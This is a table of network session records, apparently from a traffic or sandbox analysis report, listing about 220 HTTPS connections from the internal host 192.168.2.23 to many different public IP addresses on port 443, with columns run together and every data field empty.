                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24402192.168.2.234675679.120.26.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24403192.168.2.233916879.185.12.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24404192.168.2.2342012148.11.55.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24405192.168.2.2343866118.4.139.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24406192.168.2.2343820150.150.187.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24407192.168.2.2345522164.22.153.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24408192.168.2.233366264.115.39.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24409192.168.2.235931036.60.165.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24410192.168.2.2353692138.26.60.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24411192.168.2.2359528146.47.240.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24412192.168.2.2336624123.12.73.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24413192.168.2.2334178185.251.179.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24414192.168.2.234569413.239.1.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24415192.168.2.233337435.23.140.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24416192.168.2.2341608223.105.245.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24417192.168.2.234442288.92.5.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24418192.168.2.2344482105.149.212.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24419192.168.2.235142219.26.160.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24420192.168.2.2351768158.190.223.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24421192.168.2.2351266104.43.229.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24422192.168.2.2348080122.9.48.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24423192.168.2.235599227.117.14.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24424192.168.2.233526861.205.202.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24425192.168.2.2356258125.64.183.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24426192.168.2.2359920206.179.241.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24427192.168.2.233346835.209.65.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24428192.168.2.2340968159.125.197.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24429192.168.2.234529696.172.170.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24430192.168.2.2339090125.58.132.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24431192.168.2.235416840.73.31.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24432192.168.2.236017039.202.100.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24433192.168.2.234896082.166.55.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24434192.168.2.234696849.130.19.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24435192.168.2.2356256180.138.78.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24436192.168.2.2354190218.71.141.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24437192.168.2.234656867.153.230.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24438192.168.2.235593079.106.6.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24439192.168.2.2349186106.131.205.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24440192.168.2.235217886.32.206.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24441192.168.2.2332876157.167.108.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24442192.168.2.2341478193.247.182.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24443192.168.2.2358758119.94.232.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24444192.168.2.2342122217.6.3.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24445192.168.2.2346534108.56.131.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24446192.168.2.235714879.185.0.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24447192.168.2.2349902142.174.247.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24448192.168.2.235284438.31.95.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24449192.168.2.2346406128.235.54.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24450192.168.2.236021418.122.235.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24451192.168.2.234618274.235.9.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24452192.168.2.234625871.206.152.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24453192.168.2.2360498223.114.187.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24454192.168.2.2348356126.189.153.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24455192.168.2.2349892195.78.97.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24456192.168.2.2346130101.227.17.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24457192.168.2.2334148188.139.222.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24458192.168.2.235103291.178.109.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24459192.168.2.235175690.6.187.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24460192.168.2.2335368173.11.78.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24461192.168.2.233661641.182.1.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24462192.168.2.2356792144.144.65.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24463192.168.2.2359182134.129.0.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24464192.168.2.2345034118.191.100.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24465192.168.2.233924458.94.167.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24466192.168.2.2334052156.2.247.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24467192.168.2.235057048.205.129.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24468192.168.2.234625625.54.93.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24469192.168.2.233865823.186.208.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24470192.168.2.233672673.110.121.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24471192.168.2.2360640191.238.12.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24472192.168.2.2335056190.190.233.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24473192.168.2.2357428110.220.231.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24474192.168.2.23580641.85.57.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24475192.168.2.2338612144.198.252.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24476192.168.2.234693837.147.185.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24477192.168.2.234331213.101.208.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24478192.168.2.2338614121.139.173.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24479192.168.2.233925250.137.244.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24480192.168.2.234097896.12.155.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24481192.168.2.2356000129.239.253.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24482192.168.2.2337426168.62.237.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24483192.168.2.2342332197.9.11.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24484192.168.2.2353950158.81.238.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24485192.168.2.2336888194.16.88.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24486192.168.2.2335342217.85.149.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24487192.168.2.234334447.193.210.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24488192.168.2.2334070210.232.143.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24489192.168.2.2354690172.192.163.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24490192.168.2.234209657.13.158.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24491192.168.2.2358914118.85.21.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24492192.168.2.2340190180.177.63.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24493192.168.2.2333482217.159.2.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24494192.168.2.235974223.248.110.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24495192.168.2.2340102105.153.112.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24496192.168.2.2350084182.124.45.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24497192.168.2.2338612179.96.90.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24498192.168.2.2359846132.133.131.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24499192.168.2.2349648117.112.143.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24500192.168.2.235944297.234.248.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24501192.168.2.2339074199.175.15.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24502192.168.2.2360258140.243.227.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24503192.168.2.234523841.110.88.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24504192.168.2.2336634122.70.195.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24505192.168.2.2352702187.161.132.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24506192.168.2.2358864200.171.81.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24507192.168.2.235783414.158.102.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24508192.168.2.236009087.33.29.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24509192.168.2.2344698213.98.150.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24510192.168.2.233592867.250.55.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24511192.168.2.2340890139.182.64.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24512192.168.2.2349242195.79.251.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24513192.168.2.2341458207.10.70.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24514192.168.2.236055690.161.239.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24515192.168.2.234074051.176.130.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24516192.168.2.233719476.108.230.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24517192.168.2.23594662.84.66.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24518192.168.2.2341952166.178.148.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24519192.168.2.2358878105.26.214.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24520192.168.2.2349792124.141.172.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24521192.168.2.235489446.230.119.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24522192.168.2.2341350182.86.69.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24523192.168.2.2336116205.233.53.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24524192.168.2.2337270172.156.135.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24525192.168.2.234799669.57.242.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24526192.168.2.2339204174.185.116.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24527192.168.2.23393445.95.93.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24528192.168.2.235913450.174.134.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24529192.168.2.2350430204.170.48.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24530192.168.2.233302017.208.109.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24531192.168.2.233754625.83.255.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24532192.168.2.234751866.59.70.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24533192.168.2.235428846.38.40.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24534192.168.2.234698671.232.64.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24535192.168.2.2338384219.228.97.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24536192.168.2.2339534186.169.245.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24537192.168.2.2360806132.111.13.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24538192.168.2.2335050208.24.104.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24539192.168.2.235130490.156.135.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24540192.168.2.235953481.23.114.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24541192.168.2.2333406101.222.18.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24542192.168.2.2344370170.186.20.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24543192.168.2.233888463.37.140.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24544192.168.2.235642095.91.241.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24545192.168.2.2350232160.118.10.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24546192.168.2.2346992206.78.97.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24547192.168.2.234543872.43.6.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24548192.168.2.235844249.206.30.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24549192.168.2.235697446.54.154.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24550192.168.2.234363475.99.224.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24551192.168.2.233418289.249.235.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24552192.168.2.2347482179.159.211.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24553192.168.2.233839041.192.8.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24554192.168.2.2360712168.144.57.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24555192.168.2.2344088212.7.45.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24556192.168.2.23415341.8.238.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24557192.168.2.235650248.200.51.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24558192.168.2.2347710129.205.77.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24559192.168.2.2355914168.116.244.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24560192.168.2.2340356199.170.89.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24561192.168.2.233539067.22.76.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24562192.168.2.233968227.120.30.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24563192.168.2.235457431.203.13.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24564192.168.2.233645660.107.73.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24565192.168.2.2344040171.133.83.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24566192.168.2.2336510133.66.80.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24567192.168.2.233639625.106.224.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24568192.168.2.23498225.129.141.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24569192.168.2.2343088201.137.112.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24570192.168.2.2356546149.158.212.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24571192.168.2.2338772218.169.0.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24572192.168.2.2347560165.250.178.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24573192.168.2.2334686169.220.195.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24574192.168.2.2348080191.37.84.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24575192.168.2.2347216218.29.118.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24576192.168.2.2347442173.191.25.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24577192.168.2.2344598197.72.230.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24578192.168.2.2334504176.17.54.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24579192.168.2.2348198133.174.176.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24580192.168.2.235251084.232.3.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24581192.168.2.2340246147.185.222.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24582192.168.2.234270860.242.136.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24583192.168.2.234027883.158.247.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24584192.168.2.2359878153.23.254.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24585192.168.2.2358158171.186.15.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24586192.168.2.235545667.216.188.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24587192.168.2.234203841.80.218.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24588192.168.2.233576292.243.35.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24589192.168.2.233996876.171.180.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24590192.168.2.233747291.26.27.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24591192.168.2.2349496112.112.106.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24592192.168.2.235386237.91.7.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24593192.168.2.2347834154.98.182.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24594192.168.2.234806624.227.116.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24595192.168.2.234744427.113.147.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24596192.168.2.233584493.69.180.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24597192.168.2.2348208211.213.19.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24598192.168.2.235287899.119.193.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24599192.168.2.2351002167.8.148.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24600192.168.2.2342414201.127.108.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24601192.168.2.2359056203.82.147.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24602192.168.2.234961458.29.234.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24603192.168.2.2359206187.239.52.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24604192.168.2.2355814109.88.155.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24605192.168.2.2353178169.247.185.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24606192.168.2.234397823.62.152.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24607192.168.2.2348222212.150.237.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24608192.168.2.234906254.156.252.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24609192.168.2.235367625.185.225.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24610192.168.2.2339666175.83.63.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24611192.168.2.2359294222.157.138.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24612192.168.2.2345524176.15.54.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24613192.168.2.2341932140.9.1.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24614192.168.2.2359320164.196.197.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24615192.168.2.2338418131.188.135.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24616192.168.2.2338290211.152.77.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24617192.168.2.235909444.86.162.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24618192.168.2.234290654.171.1.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24619192.168.2.2333170223.43.75.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24620192.168.2.235892878.116.131.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24621192.168.2.2350884204.70.173.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24622192.168.2.2335992194.81.221.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24623192.168.2.23589744.252.49.252443
                                          TimestampBytes transferredDirectionData


